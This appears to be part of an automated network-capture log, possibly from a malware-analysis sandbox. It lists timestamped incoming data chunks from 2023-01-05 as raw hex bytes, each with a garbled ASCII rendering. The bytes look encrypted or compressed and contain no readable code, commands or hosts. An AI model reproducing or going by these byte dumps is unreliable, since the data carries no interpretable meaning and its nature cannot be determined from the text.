                                                                                                                                                                                    2023-01-05 07:59:31 UTC17788INData Raw: 71 9f 1d 74 ac cf 55 ab 86 3b 43 f4 52 89 7c 89 cb 12 59 a8 e1 8c b3 b1 08 d4 a0 97 dc bc d9 ae 60 d1 f0 cf 12 9a 2d e9 12 56 f2 1c 2f b2 3d 33 b5 67 5c 2a 44 e6 90 f1 80 9b 10 6a c5 81 7c d0 8e 99 82 1f 76 1c dc b6 e0 53 e9 4e 22 f7 fe b0 08 a6 85 d4 a5 8c 84 44 49 ed 0b ae 4b 43 47 5d b8 b5 52 88 0c 92 96 ae 2c a2 6d 48 df 4f 88 55 00 60 f9 19 44 0a 73 cb 3f d6 b7 4f b2 3b f8 e9 ce 13 36 15 5e 0a c6 de b9 14 b8 f1 9f 41 20 72 d3 f3 70 f4 29 06 14 af 99 8f cb 4a 42 7a 2a 7d 8e 78 b5 76 a2 e5 f6 a3 fb 2a 1e 5a 82 e6 0f 41 27 a1 97 f0 08 c2 c3 88 97 2a b3 df 0c 31 98 f0 df d2 c2 71 5e be 9d c2 1c 90 97 41 a0 1f 2a ed 19 e8 e1 df 8f 46 54 3e 93 41 de 2a 47 16 e8 5a 65 fa 48 64 e5 17 85 d7 c0 39 b3 eb e9 e9 cf 84 c8 ad 8f b4 3b 0c 23 a0 d5 95 62 8d 91 8a ad
                                                                                                                                                                                    Data Ascii: qtU;CR|Y`-V/=3g\*Dj|vSN"DIKCG]R,mHOU`Ds?O;6^A rp)JBz*}xv*ZA'*1q^A*FT>A*GZeHd9;#b
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17804INData Raw: a8 7e 2a 3f 23 5f bf 7f d2 aa 32 aa 30 1c 2b 36 bd 2c ea c5 7f dd dc 61 a0 52 82 c1 0a 88 f9 09 9f b1 27 e6 da 57 89 d6 f5 05 94 78 1d 74 d7 14 58 af 93 77 68 44 27 fe 27 c4 fc d6 f6 d7 7b 40 8d a9 31 64 6e 4f 3b 4c 16 ff 87 b1 f2 a7 b8 74 b6 70 5b e9 c6 5e cc a0 38 81 13 e0 b7 6c f3 52 34 35 84 a0 ef 6e 95 5e ac 47 f3 8a a0 76 88 49 f2 8c d5 60 12 c0 f7 27 e8 f9 81 5d 2f b6 d5 e0 75 d1 91 3e a0 c9 e1 67 3c 70 3f f7 dd 75 cc c4 fa a4 5e 9a 9e 52 38 cd 9b 96 f3 11 ea bc 6d 71 7b b0 59 bc ef 46 5e 4b 2f 43 52 74 75 62 d4 3b f4 5d 1d f1 fe c1 73 c0 ab 25 d1 dc e2 31 67 a6 cd e8 fe d8 21 4d 4d 4f 50 01 48 d9 67 c0 f1 c4 db 20 6b 89 71 82 2d 8e 0d c9 55 a2 f7 4e c6 3c 14 e3 0a 18 a9 45 e4 de 57 24 6b eb 0e 5e 71 f1 77 da 15 95 f4 8a 4d 34 81 85 96 31 76 a2 dc
                                                                                                                                                                                    Data Ascii: ~*?#_20+6,aR'WxtXwhD''{@1dnO;Ltp[^8lR45n^GvI`']/u>g<p?u^R8mq{YF^K/CRtub;]s%1g!MMOPHg kq-UN<EW$k^qwM41v
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17820INData Raw: f8 05 44 a0 6e 06 f6 76 a8 b8 83 a2 64 df 48 5f d9 c8 b6 a6 f5 5a 98 7d 6a 0a 93 7b ca e3 06 99 88 e0 74 f5 3e a3 be c7 f6 33 c9 86 1e 4a 1b 78 54 aa 76 5f 84 4a 3e 8f 42 01 08 fc 6e 8c 88 d9 92 5b 26 01 6f aa 53 f9 69 78 88 1c 60 6a 6d c9 34 c9 2a 6a 63 73 fb ed 14 42 c1 ad 65 42 1b 1b 8c aa 57 a3 e8 44 4e 61 eb a0 3e 10 dd 36 b7 cb 36 1c 1f 65 04 a0 08 d6 9e 10 44 de aa d0 6f b4 d5 6e 81 f6 07 1c a7 30 25 ce 14 f7 54 c3 45 29 80 8f 18 ae 78 63 1a c5 a8 b1 ee 29 d9 ee ed 42 7e be 51 47 50 6f 91 8b 32 46 cc e5 62 79 f1 b7 e0 f0 e4 1d f5 87 d1 ad 75 9d 8c bb d8 d8 c9 95 16 8d 7d c0 0b e3 a1 0e 47 64 b1 ba b7 24 68 a9 d8 16 68 ee 46 e6 0b 41 12 73 a4 5b 4b 82 ea 6f c8 ef 09 40 db 56 27 5a 27 28 f6 be bd 09 a7 de 67 5f 7a c8 1a 2c 0a c2 04 29 a8 96 db 60 06
                                                                                                                                                                                    Data Ascii: DnvdH_Z}j{t>3JxTv_J>Bn[&oSix`jm4*jcsBeBWDNa>66eDon0%TE)xc)B~QGPo2Fbyu}Gd$hhFAs[Ko@V'Z'(g_z,)`
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17836INData Raw: bd f8 81 6f fe a6 21 b9 c5 60 63 fa 58 f9 5f a7 51 f3 f9 a3 52 c4 0d e5 c8 74 c4 a5 35 f1 12 39 0e ca c3 49 15 a3 4f 79 8b 3c 2d aa a1 6b cf c7 f4 8e 17 a4 90 c1 44 b5 b2 86 b2 f4 69 d1 92 21 4b aa 4d ac 16 84 d8 b4 86 94 eb 76 b9 a9 d4 50 c2 40 74 66 67 65 51 92 89 0e b5 2d c4 b5 27 2f e6 39 29 5f 25 45 f6 c0 ec 7f a2 57 2e 74 6c 71 2c 41 cf 3c 39 51 10 a7 ca 1e 55 37 72 43 78 42 76 d2 fc 68 aa 49 67 79 7b 3d 9d d4 78 e8 4f df 43 7f 8f e5 33 f1 6a 5d dc 85 3a 03 2a b5 94 48 27 8c 10 d2 ca 73 d5 12 a2 0b d4 b0 64 b5 a3 1b 0d 77 7e 4c a7 7e 86 19 3b 0d a9 4a 9e 9b c5 d9 8e c8 0a 62 70 98 8c 99 92 95 1b 93 51 e7 17 ec d6 0b f7 f0 a8 27 ae 2c 4e 39 1a 48 0f ca 6b a5 62 45 6e d4 2f 72 42 92 fb 01 ad ee 8c fc a4 5b c9 c4 84 4b c3 b7 06 6a ee c1 af 81 22 49 20
                                                                                                                                                                                    Data Ascii: o!`cX_QRt59IOy<-kDi!KMvP@tfgeQ-'/9)_%EW.tlq,A<9QU7rCxBvhIgy{=xOC3j]:*H'sdw~L~;JbpQ',N9HkbEn/rB[Kj"I
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17852INData Raw: 25 b1 c5 cc 58 56 20 cd f1 82 9c 17 fa d4 c0 6f 5b ba bb a7 ae 65 8c d4 a4 23 81 57 97 87 b0 f8 49 57 60 66 7e 1e 90 75 dd f0 23 a9 69 db fd d0 e1 99 41 80 21 28 cf 7e 13 58 89 9f b7 ee 92 31 08 e0 3b da cf da 68 04 18 f0 eb f0 73 15 00 bf 8c f4 ba 3d 14 18 82 89 1e 41 b9 b5 2a 8c 9e 37 47 65 99 85 32 53 18 86 7b cb 28 07 76 cf 29 80 e1 3e cd 85 7e a6 3b 56 98 46 b1 29 20 b6 5c 34 62 be c5 02 09 9d ac 15 36 74 17 73 d2 cd ef cd 20 32 9c 6b de c2 cc d8 10 7e 03 f0 e6 ab 7e 91 c0 15 04 6d b3 e7 d1 07 a5 57 47 ba 5d 9d aa 9c f1 30 0c 3c d7 0e f3 89 43 98 ed f7 e9 a5 e7 86 64 ab 5d 70 ad bd 6a 3e 6b ac 48 86 90 08 78 8b aa f0 03 a4 83 e9 cb 4c b1 59 96 c1 14 1c 49 e2 25 91 e4 21 02 b4 4d fd 45 14 3d 80 0c 43 06 f8 34 95 aa ff 5e 3f f6 69 79 85 e2 0d f0 72 53
                                                                                                                                                                                    Data Ascii: %XV o[e#WIW`f~u#iA!(~X1;hs=A*7Ge2S{(v)>~;VF) \4b6ts 2k~~mWG]0<Cd]pj>kHxLYI%!ME=C4^?iyrS
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17868INData Raw: e0 d7 ce dc ed 32 c5 c9 2f 3f 7c 7f c9 77 63 13 b5 ce b8 a9 db af 08 ac 6b bc 67 3e d2 16 3f e8 3c cc 74 a5 eb 73 53 32 e9 09 03 fa 16 df f5 69 f9 14 17 20 e7 8b 20 40 f4 7a 11 70 b6 2f 80 30 30 71 55 d8 e7 e3 97 8c 2c 26 43 cd ab 64 2c 26 e5 b3 3f 03 e8 7e 53 a3 88 15 7a ec 78 c0 7e a8 1c 06 38 db 0d 7e 8d 97 20 a2 e6 6b 76 84 e1 45 8e c0 e3 ff 92 69 de 02 3a 15 7a af 33 a7 b0 c5 69 bb d3 a1 c3 8d 78 82 2f 20 25 0a cc 9c 67 01 03 78 d6 89 a8 24 57 e5 d2 66 15 ae af e0 d4 23 90 a2 45 72 55 70 eb 09 e6 ba 75 09 0f b9 d3 5d d0 83 f3 2d 91 ba a0 a6 f9 1e 4f a8 6d 2c 2c 9b 5b a4 12 35 af 76 83 48 53 01 8b f8 5c fb 73 10 d8 03 41 cd da 23 09 ca 7d 3f e6 33 a7 f8 39 86 2d 14 70 de 7f 30 60 55 7c 35 6f 8f d6 64 95 80 34 7e 29 d0 72 0c f7 9f f0 50 e1 ea 27 17 a8
                                                                                                                                                                                    Data Ascii: 2/?|wckg>?<tsS2i @zp/00qU,&Cd,&?~Szx~8~ kvEi:z3ix/ %gx$Wf#ErUpu]-Om,,[5vHS\sA#}?39-p0`U|5od4~)rP'
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17884INData Raw: c2 37 d4 a5 fe a6 f4 a8 73 df 3d 28 5d fa 5a 54 6c e2 b6 bc 25 bc 9d 86 2c 78 68 a8 57 33 b4 6d 23 c8 4d b2 46 c6 2d 69 a1 51 a3 20 e7 96 83 9b e2 b8 2b ad 65 f2 7a 71 01 a2 6f de 54 9d 65 e7 5c 42 27 c8 78 35 93 58 09 fc 5d d6 86 4b 3c 22 25 6e 86 58 ac e6 66 cf ad 46 20 b7 95 a6 24 c2 6d 66 7b 3d 06 c2 5e 4b 9a 65 29 3a 6e e5 af 82 e4 07 27 58 c9 cd 70 1b 84 34 75 a6 ca 41 15 09 6a 5d 15 76 cf 4f c6 7f e5 d6 99 4d 16 fd b5 55 f1 6a 25 9c 44 ed ee 01 a9 56 af 05 bd 8e c0 88 e5 76 38 26 70 b5 c3 23 3b ee ac d0 cc 5a 66 a1 6b bd e7 b8 30 cb bf f7 a0 83 9e d4 49 57 37 ab 2d 8f c9 2f ca 6f 68 2f 36 3b cf 87 e8 53 3b be 31 a3 14 3a cf bc 73 0b aa ce e6 27 90 df d7 e0 a3 94 da 8f 1a c3 a8 17 fe b8 49 64 85 43 46 a8 32 d1 8e 9d 1c 18 9c 9b 6f 93 46 0e ac 58 c5
                                                                                                                                                                                    Data Ascii: 7s=(]ZTl%,xhW3m#MF-iQ +ezqoTe\B'x5X]K<"%nXfF $mf{=^Ke):n'Xp4uAj]vOMUj%DVv8&p#;Zfk0IW7-/oh/6;S;1:s'IdCF2oFX
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17900INData Raw: 87 88 e4 2b 1b d0 53 d5 b8 1f 96 da f2 f4 82 ca 23 a6 0e 28 34 99 81 0a d5 bd d1 23 8f d7 2a c2 86 9a 4b 09 50 b8 49 bf fa 5b dc bc c8 ce ea fe 9e 83 0b 4f 24 a7 5a a2 03 d6 c5 cb ae 7d 69 cf ac 3d 6b a3 af a6 2a ae d5 ba 29 3c 8b 14 65 3f 10 46 9b 81 8c 91 aa 46 0a 67 e1 ca 1b 25 1b fb 7c 0e c5 7e 51 7d 47 3f 2d be c4 63 8d a3 5e 3c 93 e9 a3 52 d6 2d a4 d0 69 6d 5a 39 59 af 44 b4 86 d6 97 c0 78 32 06 15 75 3d 30 36 1e a1 4d 0c e7 5e 3f 50 fd cf b5 2b 18 9c 31 40 a8 3e 13 73 27 de ec 27 a7 18 56 af 6e dd af d5 76 6c 58 c2 92 c9 9a f3 9a e2 99 b1 a8 cb b2 c8 8c a8 c7 a7 8f cf be 27 1e 24 07 18 80 d5 a0 58 15 e3 c3 5c f0 9b 82 61 b6 b3 ba d8 41 c5 42 22 e5 ac f7 28 d4 43 da 35 76 d7 c7 6e 7f 2e f2 8a ca 7c 01 85 93 07 d4 6b b4 9d 0c 50 c0 b4 90 c2 54 3f 24
                                                                                                                                                                                    Data Ascii: +S#(4#*KPI[O$Z}i=k*)<e?FFg%|~Q}G?-c^<R-imZ9YDx2u=06M^?P+1@>s''VnvlX'$X\aAB"(C5vn.|kPT?$
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17916INData Raw: 29 72 b1 2a db fe 4e 5e 26 e6 9e 9a 83 18 bc 08 3a 37 d2 ed 3d cd 85 a4 47 2b 55 5e 5d 9a 9b e8 90 78 3d 31 17 4f 44 ad 18 67 b4 e4 f4 24 86 6c e0 09 f6 6b bb 10 6a 1f da cc 95 16 3a 44 d0 8f be 7f f8 b5 ca d6 2d c2 9e 27 d0 93 23 8d a2 d1 d4 81 93 d2 fd e9 6b bd 20 1f 20 f5 e7 b6 86 75 b9 7f 05 12 b5 10 31 96 46 2e 3b 45 00 20 1f 41 8f d9 83 4a ea f6 ff 77 2f 7f 40 a0 e6 7a c7 07 99 02 8f 83 26 b0 14 fd 2e 9a d6 6d ec 39 b7 7d 32 56 48 03 8a 32 97 64 59 af 14 9c 50 65 8a 2f 60 bc 20 6b 5c d8 9d 4f bb b0 33 d0 4a 73 3d a8 0a ec a5 20 05 38 1b 6d 16 b6 d9 43 28 e4 0f d8 a0 72 1a f0 66 2c d4 ab e6 79 42 42 1a e9 6c b4 9c 67 7f 89 5f 81 ff e9 e8 d5 6f fb 62 a9 11 cd 49 ff ee 9b ed 8f ab cd 66 3c d9 74 3b 33 bf 6a e0 21 9e e3 98 c9 9d e3 70 d9 6f d7 9c 2a bf
                                                                                                                                                                                    Data Ascii: )r*N^&:7=G+U^]x=1ODg$lkj:D-'#k u1F.;E AJw/@z&.m9}2VH2dYPe/` k\O3Js= 8mC(rf,yBBlg_obIf<t;3j!po*
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17932INData Raw: 6f a5 5a 74 fb f7 88 10 31 8b 10 c5 0b 54 16 8c d0 5c 21 f3 eb 36 1e f7 54 59 10 19 8c d6 78 5f bb f3 46 01 91 8d f2 91 10 78 06 a8 dc 20 2a 23 ac 1a 2d aa fc e1 74 c8 10 85 da 2d b0 cf f7 e7 6c 57 9b 09 02 8c c5 57 d0 71 68 18 28 4f 41 a8 e2 d8 3c b6 9f bb e0 f2 a2 3d b9 7b 45 51 6d ca 0e a9 0b 98 30 ad e3 d6 f9 f6 40 09 08 62 fb 6c 1d f3 be 3c 43 93 ef 2f ed bc be 86 d7 f7 22 c2 54 68 44 96 05 89 46 e2 98 09 75 27 a5 6e cb d4 93 36 fe 8e 90 4e 63 7a 79 c5 7b 09 36 2a 37 29 37 80 f1 84 dc 7d c2 08 2c 87 17 ee 2f 90 ab 27 af be 6d d2 04 55 06 dc 7c 55 22 04 f3 3e 93 17 da b9 c8 32 8a 2d d0 cc 01 47 df f4 9b 70 70 4a 60 21 4a 49 74 fa 49 1d 3c ea a1 ab a2 42 27 a7 ff 31 e7 2c 47 0e 71 4f f5 89 b6 e0 a7 57 4e 7a 43 da 20 a1 22 73 40 96 a5 cf 8f aa 88 02 60
                                                                                                                                                                                    Data Ascii: oZt1T\!6TYx_Fx *#-t-lWWqh(OA<={EQm0@bl<C/"ThDFu'n6Nczy{6*7)7},/'mU|U">2-GppJ`!JItI<B'1,GqOWNzC "s@`
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17948INData Raw: d1 80 de 99 3b 4f fd a6 57 e3 e1 23 13 90 fd 99 11 aa 51 8a fc 10 85 bc d2 bb cd c1 f8 cf 3a db a8 e9 9e ff 7f 1f 5e 06 2c 79 61 61 75 5d 22 98 33 87 cc cc 9a 7a 09 43 88 b8 77 c9 be fe 2f 05 b2 db 09 e8 10 37 4e e9 c0 8e db d4 a7 37 69 08 32 cf b7 06 08 43 e8 0f 53 70 42 ff 8d 56 00 b2 92 7c 89 1b d4 55 93 14 fb f7 6a c7 98 e8 b8 e1 95 72 38 e3 4f c3 3a 2d d9 12 41 19 2a a2 d4 6e 92 e9 e3 1b da 44 c5 a5 43 32 65 5e 49 98 2d fe ab f7 76 de f6 86 1e f9 8b 1d 4a b6 b9 cb 50 47 f6 cd 8d d5 78 bd 13 65 a4 7f de 58 b6 8d 53 98 c6 dd 53 fb 14 f1 ce c3 50 4f c4 9a 77 d0 81 ef b3 f8 d4 02 8a 72 19 d4 46 f2 c2 18 b8 20 bb 67 f2 05 72 91 4b 6c a2 9b d2 c7 7d cb 97 b2 e1 82 c9 82 8e da ec e6 79 eb 6a f8 f1 03 0f 76 e3 27 84 d3 4d 1a 7e 82 3d f8 04 e2 d4 fc 52 ec f8
                                                                                                                                                                                    Data Ascii: ;OW#Q:^,yaau]"3zCw/7N7i2CSpBV|Ujr8O:-A*nDC2e^I-vJPGxeXSSPOwrF grKl}yjv'M~=R
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17964INData Raw: 37 62 21 78 89 c6 df b3 86 59 ef 1d 86 90 47 82 c8 31 7a f7 13 53 b7 bf e7 43 ab 59 cb 1f 8b a4 7d ca b5 6d ec d2 be 7c 06 c0 f2 1e 90 ec 4d b0 93 b2 a8 34 2e cb bf 86 3d 56 f3 cb 89 bc d6 49 6e e1 71 fa ba f2 cb 3e 8e 79 55 74 e5 eb d9 4a 68 15 bb 0c 92 79 44 3e 4e d8 54 64 2b e1 1a 2d fb 01 b8 3c 5f 23 3e 5c f0 d2 b5 d6 83 b5 f8 58 ee 5e 6c 7b e2 57 d4 d6 a0 ac d9 9f b5 7b c4 07 71 65 e9 f1 8b 77 b5 7c 6a a8 cc e8 5e d1 61 b7 7b a1 83 97 39 5c ba 5c 20 62 92 f4 60 98 3c 0c df e0 67 fb 14 7c 4e 04 b8 1f a0 a4 12 0c 2a fd 2c 29 af ec 6f f1 6d c2 49 b6 ac ea e0 08 5b df 74 6e 23 79 51 87 55 4d 32 6d a7 c7 77 08 74 26 df 27 3d d5 38 5c 00 8b fc 8c f1 7f e0 d8 00 75 5b 61 c5 44 72 60 06 cd 42 a8 2b a9 80 4a f5 74 ef 00 44 8a ff 50 5c bf 7f 43 bc 80 65 64 e9
                                                                                                                                                                                    Data Ascii: 7b!xYG1zSCY}m|M4.=VInq>yUtJhyD>NTd+-<_#>\X^l{W{qew|j^a{9\\ b`<g|N*,)omI[tn#yQUM2mwt&'=8\u[aDr`B+JtDP\Ced
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17980INData Raw: 7b d4 94 3f f1 1f 08 5e 88 ff ed 3d e9 15 15 88 99 91 19 fa c7 76 8c 40 02 04 4f 33 2a 35 8b f6 29 75 06 8e 5a 3a 98 3e 21 d0 c9 35 db 59 25 15 d9 f2 c9 fc e0 a2 59 8c be a9 e8 2d 5c ef 55 c3 98 2e 2a 07 7c 0c 9c 7a 53 e8 0c 5a ef 6e fd 34 65 17 e5 2e 0c 89 62 7f 95 c8 4e ac a5 62 49 a4 33 89 ac 97 fb d8 c7 d7 ea 0d 38 f4 94 63 3e cd bc 3f 0b d7 2a 5d 91 69 ce 77 f7 eb 2c 4b 8c e7 7e 6f a6 96 a7 19 cf ca 8a a0 b1 83 08 5b b4 5e 51 e5 9a f7 f0 d3 d2 a3 d6 e6 8a 8d 82 c5 23 5a 0a 25 65 34 bb c5 84 9a f7 f0 32 5d 85 fa a1 9c b5 20 9d 46 83 99 aa e4 04 94 0c 01 df 32 6b 37 7a ef 0d 0e 55 78 8b b2 e1 89 b8 9c 25 c4 cb 23 0a 36 10 7f 57 de f8 b6 e7 3b 46 4e 22 a8 bc 62 81 0c 4f 41 9a d6 35 0b d6 58 2f 6b 87 0c 7a 9e d7 8d 6f 6a 6d a6 5d e1 56 1d a7 05 b2 e5 81
                                                                                                                                                                                    Data Ascii: {?^=v@O3*5)uZ:>!5Y%Y-\U.*|zSZn4e.bNbI38c>?*]iw,K~o[^Q#Z%e42] F2k7zUx%#6W;FN"bOA5X/kzojm]V
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17996INData Raw: 4b 91 0c 5f db 03 25 04 5d 34 59 0c 88 47 18 8b e1 e7 5c 01 87 98 71 55 51 5d 0e a3 0d eb 98 5c 7c e4 77 d8 d7 aa ab 97 5d f4 3f 21 66 99 49 0e 06 4d 7a 53 40 f9 ba 4f ca ce a2 3d c5 df ee ca 3e 1e 8d 79 bd 41 d9 94 66 ce 8a 71 11 91 64 7f 11 96 23 39 27 cf 3e 91 bd f4 0f 08 35 1f 96 ab 7c 54 38 c8 29 04 c3 2b fe 9a 7a 89 ce 00 95 dc a3 07 17 d9 92 1e 7b e6 c8 6c aa 98 04 fd 02 bd dd ab ed 6a a9 7b 77 00 bb 5a 60 7b 41 66 0a 27 71 f2 28 c9 49 ac f5 9d d0 78 87 d0 4f 07 e6 2f bb 19 2c 88 33 b2 3d 69 ae 20 09 61 c6 ef 66 95 da 8b 0c a2 bf 1c 67 6c 25 83 c7 a8 16 8a c4 85 73 0d 2d e2 64 09 60 56 e1 cf a0 c3 ef f5 99 ac b4 7b cc 5c 11 ec 51 7d 24 3d 9d 21 79 9a 26 dd 6f ad c0 f5 20 59 38 50 38 5c 00 9b 69 7a 9e b4 68 d5 ac 29 ef 6e f2 67 a4 e1 bc a2 94 53 03
                                                                                                                                                                                    Data Ascii: K_%]4YG\qUQ]\|w]?!fIMzS@O=>yAfqd#9'>5|T8)+z{lj{wZ`{Af'q(IxO/,3=i afgl%s-d`V{\Q}$=!y&o Y8P8\izh)ngS
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18012INData Raw: 8c b5 69 c1 5b 8e ea 7c da f6 0b 58 07 6d e5 09 a2 ff d5 6e 4f c0 47 58 8c 40 9c 73 c1 7e 2a f7 92 65 f1 9d 7f b1 ef e8 c0 35 1d 80 2e 2e 4e f0 ca 8e aa 42 25 09 88 13 72 db e6 08 c4 a2 1a 7c cf 58 10 e3 d0 38 5e 17 28 5f be 3f 58 67 da 32 7d 7f 51 12 fa 41 b2 99 46 01 84 fc 1a a3 cf 15 50 3d 81 b9 82 84 3a b9 c3 b3 21 a3 aa f8 46 39 0b 7f 1f c3 73 e4 84 9d 76 37 67 c4 08 b8 c6 07 6d fa 5a 60 31 ce f7 fe d7 db bd 7e 54 e4 0f 7e d2 80 ec aa ed f0 ad 35 d8 da 64 9f 98 72 ea a7 57 47 0f 74 47 65 5f 14 56 03 44 c6 8b 0d a4 bc b9 36 b7 8e f7 a3 bc 77 32 14 5c f1 b8 dc 79 c2 8e d3 4b 89 d8 43 11 bf ec e4 14 35 fe 6d 80 2d 5b 81 4d de 6e 5e b2 b8 4a af a9 f6 04 99 f3 4c 0e a1 82 47 3c 32 05 d0 da d5 b1 d4 7e 7d 66 f0 50 8b c6 0e 04 c2 87 54 45 e0 12 2d 8c d4 64
                                                                                                                                                                                    Data Ascii: i[|XmnOGX@s~*e5..NB%r|X8^(_?Xg2}QAFP=:!F9sv7gmZ`1~T~5drWGtGe_VD6w2\yKC5m-[Mn^JLG<2~}fPTE-d
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18028INData Raw: 61 b9 9c 3d 06 05 37 4f 89 89 d1 91 a3 4a 9a 52 7b 47 52 df 3b ed 85 d1 74 e9 38 91 ba 55 98 7f 7b b6 12 6a 75 49 29 2b 68 d8 d6 2d e9 5f 28 ed e7 5c 63 9f 95 b8 a6 c8 99 c7 04 67 86 70 99 b9 d4 4d c1 56 d3 f2 2e 0b d6 28 7d f2 96 f3 b6 c1 0b 81 20 1f dc a6 6b ac 3e cb 19 7c 77 3b 9b a3 98 7d 6c 6c 55 1c 44 24 9a cd 4d 6e 0a 42 ca 66 56 f0 a6 73 ad c8 f4 d9 3e 6e 9c 1d cb e2 86 0e b6 e0 a2 aa 1e 23 06 c4 a2 82 1a 27 0d a5 43 8d f6 b8 ad eb 83 72 e8 e2 48 97 22 27 21 55 b1 9d d5 23 0f 0d 02 5d 70 0d 95 2a bc e2 a1 14 a4 25 af 37 30 a8 68 9f d3 d6 36 31 7d 33 90 a6 49 c6 09 54 57 bb de 8c 16 1f 25 43 4d 85 93 9a 3a 3b 16 71 2b e1 67 3e ae 54 c5 09 ad 6e 4a d0 f6 1f 8e 6a 61 b6 57 49 bd 19 22 b5 67 71 89 2b 85 a6 5e 84 c0 73 3e 25 9e b5 c2 02 80 50 c3 78 d9
                                                                                                                                                                                    Data Ascii: a=7OJR{GR;t8U{juI)+h-_(\cgpMV.(} k>|w;}llUD$MnBfVs>n#'CrH"'!U#]p*%70h61}3ITW%CM:;q+g>TnJjaWI"gq+^s>%Px
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18044INData Raw: 20 fa 0d 9d fd ff 2d cf 91 28 bd e5 97 6b 70 aa f4 1c d2 d1 cb b3 18 b0 cc 06 91 a7 f6 15 68 5b db 05 59 8c a7 ca 45 3b 8b 8c 05 2a 0e 2d aa 14 32 79 c5 2f e1 b8 30 e6 0a 14 3c 70 f3 2b ef d0 c0 98 33 5a 2d aa a2 35 42 1e 5c 64 70 7d d8 64 6a 2b 7a b9 65 0c 64 d6 1e 33 6b 8b 15 81 cc 7a dc 3f 48 5c f5 a9 92 d2 96 f3 d5 e9 72 5e 9a b8 27 ef eb bc 57 ca 6f 9d 31 52 cd 5a ca 0a 97 7f 48 79 44 a0 5e 04 05 27 e7 62 0b 4d 73 71 67 b8 83 54 63 ea 4a 42 71 68 01 54 36 39 b7 87 e6 70 e9 bb a7 db fa c9 8e 5b 0a b0 41 65 94 f8 97 44 3a 01 75 f9 fa 7b 38 66 17 78 a6 5f 42 45 8a 9d b0 c0 9b c6 8a cf 49 d1 48 86 77 d8 60 1f 62 03 f1 97 75 ce df 5c fa d3 37 d2 ce 37 aa ce 10 7a 85 23 01 94 b6 f7 b5 cf b4 f3 c4 6d b1 cc ad 10 19 af 58 77 4e ce 64 73 2f 67 81 80 e2 9c 9e
                                                                                                                                                                                    Data Ascii: -(kph[YE;*-2y/0<p+3Z-5B\dp}dj+zed3kz?H\r^'Wo1RZHyD^'bMsqgTcJBqhT69p[AeD:u{8fx_BEIHw`bu\77z#mXwNds/g
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18060INData Raw: 6f d8 a3 43 bd 9b 5e 57 93 eb f4 15 dc b6 25 2b 52 b9 76 0b 06 82 c9 c6 c3 99 17 15 75 35 7c 9a 08 c8 f5 a5 9e 92 2b f7 fe ac bc f2 aa e9 7b 99 24 3c ef f7 46 74 c6 5e 73 4b be 03 cb 1f 28 ff 83 8f 51 a6 6a 8a 40 cf a2 16 8b 00 5c 64 a2 be 64 f1 a7 cc 75 87 26 85 05 27 a6 f6 a4 24 9b 71 80 71 21 8a 88 9b a0 44 e6 05 41 df 8c 87 44 97 16 41 17 6b 00 6e 13 48 25 d0 92 5a 34 76 8d b4 d8 ed 7b a8 d0 91 b7 e8 14 f6 c5 38 97 00 09 d7 93 52 d6 aa 41 d4 4d 73 dc 34 cb 7a 7e 66 72 eb 06 59 fb 90 5a 92 e6 15 8c 76 a0 78 ca 44 ec 79 e7 a9 4f 36 c6 8b 11 dc 99 d9 08 d1 3b 2b bf 40 99 2e 0d 2a b7 7e ba 94 4c 56 3b 36 e3 0f ea 8c 37 46 59 ba 05 b7 6b c1 69 a7 12 87 c7 ae ec 60 e8 71 8d 4f bf a4 36 65 44 53 e2 c7 86 47 8f bd fc bc fe 4f 03 e6 a1 c2 69 d8 52 14 8d 18 fc
                                                                                                                                                                                    Data Ascii: oC^W%+Rvu5|+{$<Ft^sK(Qj@\ddu&'$qq!DADAknH%Z4v{8RAMs4z~frYZvxDyO6;+@.*~LV;67FYki`qO6eDSGOiR
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18076INData Raw: f8 45 6d b0 13 98 a0 54 72 40 2c dd 59 1b d4 d9 1c bb a8 0c 07 f3 63 ad d8 24 98 73 f9 63 ca 25 56 08 b1 83 76 f7 f2 98 47 ac c3 51 31 da 75 9a 65 62 43 a8 1f c4 be cb c0 c9 da 80 60 c8 6f f0 4f bc e5 9d 68 5b 03 b5 1f 4c e5 6f 61 f6 b8 bc 20 d3 97 4b 4e 31 50 88 3f e6 e1 53 61 97 d4 bf 04 2f 20 cd 02 80 c7 5e bd c3 52 88 22 ba 8d 9b 89 47 7a 2f 90 14 a1 16 b0 e1 14 d7 27 12 a6 5b d6 bc dc 08 a2 dc ee 71 4c c6 99 4c f3 3b e8 c8 87 b1 42 f0 5c ed 14 28 11 df d1 b8 0f 03 dd 44 94 98 7f 4c 2e cd 9e e6 09 9a a7 dd c9 05 72 ba fd 54 9a 61 11 74 66 69 bf a4 16 59 b5 e8 fb 6c b3 49 60 09 de 8f eb 5a 38 31 be b0 d0 7c e9 ff 8d d6 1a 55 6e 7d 7b 72 8d 10 94 a3 2d 9d 8d 78 75 5f ea 1e f0 81 8e f7 a5 39 4b 25 89 61 6b 9a 44 66 84 bf 37 7d 3b 9c 21 97 d3 20 aa 2f c8
                                                                                                                                                                                    Data Ascii: EmTr@,Yc$sc%VvGQ1uebC`oOh[Loa KN1P?Sa/ ^R"Gz/'[qLL;B\(DL.rTatfiYlI`Z81|Un}{r-xu_9K%akDf7};! /
